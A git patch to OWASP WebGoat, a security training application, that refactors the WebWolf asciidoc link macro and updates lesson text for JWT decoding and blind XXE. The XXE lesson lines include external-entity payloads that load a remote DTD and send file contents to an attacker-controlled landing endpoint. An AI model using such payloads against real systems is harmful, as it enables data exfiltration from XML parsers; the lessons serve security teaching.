From a1071e9c00936ff39f548ce0914a696b1cbc7287 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Fri, 23 Apr 2021 15:11:56 +0200
Subject: [PATCH] Fix return type of asciidoctor macro implementation.

---
 .../owasp/webgoat/asciidoc/WebWolfMacro.java  | 33 +++++++++++--------
 .../resources/lessonPlans/en/JWT_decode.adoc  |  2 +-
 .../resources/lessonPlans/en/XXE_blind.adoc   |  4 +--
 .../lessonPlans/en/XXE_blind_assignment.adoc  |  2 +-
 4 files changed, 24 insertions(+), 17 deletions(-)

diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java b/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java
index 40b1ba555..d54a307cf 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java
@@ -2,18 +2,17 @@ package org.owasp.webgoat.asciidoc;
 
 import org.asciidoctor.ast.ContentNode;
 import org.asciidoctor.extension.InlineMacroProcessor;
-import org.springframework.core.env.Environment;
 import org.springframework.web.context.request.RequestContextHolder;
 import org.springframework.web.context.request.ServletRequestAttributes;
 
 import javax.servlet.http.HttpServletRequest;
+import java.util.HashMap;
 import java.util.Map;
 
 /**
  * Usage in asciidoc:
  * <p>
  * webWolfLink:here[] will display a href with here as text
- * webWolfLink:landing[noLink] will display the complete url, for example: http://WW_HOST:WW_PORT/landing
  */
 public class WebWolfMacro extends InlineMacroProcessor {
 
@@ -26,14 +25,22 @@ public class WebWolfMacro extends InlineMacroProcessor {
     }
 
     @Override
-	public String process(ContentNode contentNode, String target, Map<String, Object> attributes) {
-        Environment env = EnvironmentExposure.getEnv();
-        String hostname = determineHost(env.getProperty("webwolf.host"), env.getProperty("webwolf.port"));
+    public Object process(ContentNode contentNode, String linkText, Map<String, Object> attributes) {
+        var env = EnvironmentExposure.getEnv();
+        var hostname = determineHost(env.getProperty("webwolf.host"), env.getProperty("webwolf.port"));
+        var target = (String) attributes.getOrDefault("target", "home");
+        var href = hostname + "/" + target;
 
+        //are we using noLink in webWolfLink:landing[noLink]? Then display link with full href
         if (displayCompleteLinkNoFormatting(attributes)) {
-            return hostname + (hostname.endsWith("/") ? "" : "/") + target;
+            linkText = href;
         }
-        return "<a href=\"" + hostname + "\" target=\"_blank\">" + target + "</a>";
+
+        var options = new HashMap<String, Object>();
+        options.put("type", ":link");
+        options.put("target", href);
+        attributes.put("window", "_blank");
+        return createPhraseNode(contentNode, "anchor", linkText, attributes, options).convert();
     }
 
     private boolean displayCompleteLinkNoFormatting(Map<String, Object> attributes) {
@@ -41,9 +48,9 @@ public class WebWolfMacro extends InlineMacroProcessor {
     }
 
     /**
-     * Determine the host from the hostname and ports that were used. 
+     * Determine the host from the hostname and ports that were used.
      * The purpose is to make it possible to use the application behind a reverse proxy. For instance in the docker
-     * compose/stack version with webgoat webwolf and nginx proxy. 
+     * compose/stack version with webgoat webwolf and nginx proxy.
      * You do not have to use the indicated hostname, but if you do, you should define two hosts aliases
      * 127.0.0.1 www.webgoat.local www.webwolf.local
      */
@@ -51,11 +58,11 @@ public class WebWolfMacro extends InlineMacroProcessor {
         HttpServletRequest request = ((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest();
         host = request.getHeader("Host");
         int semicolonIndex = host.indexOf(":");
-        if (semicolonIndex==-1 || host.endsWith(":80")) {
-        	host = host.replace(":80", "").replace("www.webgoat.local", "www.webwolf.local");
+        if (semicolonIndex == -1 || host.endsWith(":80")) {
+            host = host.replace(":80", "").replace("www.webgoat.local", "www.webwolf.local");
         } else {
-        	host = host.substring(0, semicolonIndex);
-        	host = host.concat(":").concat(port);
+            host = host.substring(0, semicolonIndex);
+            host = host.concat(":").concat(port);
         }
         return "http://" + host + (includeWebWolfContext() ? "/WebWolf" : "");
     }
diff --git a/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_decode.adoc b/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_decode.adoc
index 423e289e3..5a111fbc4 100644
--- a/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_decode.adoc
+++ b/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_decode.adoc
@@ -1,6 +1,6 @@
 == Decoding a JWT token
 
-Let's try decoding a JWT token, for this you can use the webWolfLink:JWT[] functionality inside WebWolf.
+Let's try decoding a JWT token, for this you can use the webWolfLink:JWT[target=jwt] functionality inside WebWolf.
 Given the following token:
 
 [source]
diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc
index 3915b08bc..b2952ce64 100644
--- a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc
+++ b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc
@@ -13,7 +13,7 @@ We can again use WebWolf to host a file called `attack.dtd`, create this file wi
 [source, subs="macros, specialcharacters"]
 ----
 <?xml version="1.0" encoding="UTF-8"?>
-<!ENTITY ping SYSTEM 'webWolfRootLink:landing[noLink]'>
+<!ENTITY ping SYSTEM 'webWolfRootLink:landing[noLink, target=landing]'>
 ----
 
 Now submit the form change the xml using to:
@@ -22,7 +22,7 @@ Now submit the form change the xml using to:
 ----
 <?xml version="1.0"?>
 <!DOCTYPE root [
-<!ENTITY % remote SYSTEM "webWolfLink:files/attack.dtd[noLink]">
+<!ENTITY % remote SYSTEM "webWolfLink:[webWolfLink]">
 %remote;
 ]>
 <comment>
diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc
index a6e060d9e..e7d2d112a 100644
--- a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc
+++ b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc
@@ -11,6 +11,6 @@ In the previous page we showed you how you can ping a server with a XXE attack,
 
 |===
 
-Try to upload this file using WebWolf landing page for example: `webWolfRootLink:landing?text=contents_file[noLink]`
+Try to upload this file using WebWolf landing page for example: `webWolfRootLink:landing?text=contents_file[noLink,target=landing]`
 (NOTE: this endpoint is under your full control)
 Once you obtained the contents of the file post it as a new comment on the page and you will solve the lesson.
\ No newline at end of file